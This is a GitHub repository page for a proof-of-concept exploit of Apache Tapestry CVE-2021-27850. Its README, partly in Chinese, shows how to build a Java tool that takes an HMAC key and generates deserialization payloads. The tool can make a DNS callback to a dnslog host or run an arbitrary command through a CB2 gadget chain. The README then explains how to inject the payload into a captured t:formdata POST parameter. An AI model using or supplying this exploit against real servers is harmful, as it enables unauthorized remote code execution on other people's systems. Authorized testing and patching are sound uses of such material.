Skip to content

Ovi3/CVE_2021_27850_POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
gradle/wrapper
gradle/wrapper
 
 
src/main
src/main
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
build.gradle
build.gradle
 
 
gradlew
gradlew
 
 
gradlew.bat
gradlew.bat
 
 
settings.gradle
settings.gradle
 
 

Repository files navigation

命令使用

git clone https://github.com/Ovi3/CVE_2021_27850_POC.git
cd CVE_2021_27850_POC/
gradlew runnbaleJar

java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar
[Usage]:
        java TapestryExploit [Tapestry Key] DNS [URL]
        java TapestryExploit [Tapestry Key] CB2 [Command]

# 假设 hmac key为 change this immediately 
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" DNS "http://xxx.dnslog.cn"
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" CB2 "calc"

漏洞复现

访问Tapestry应用,触发一个POST请求(如登录请求),抓包,修改t:formdata参数值为上面生成的payload

About

Apache Tapestry CVE-2021-27850 PoC

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages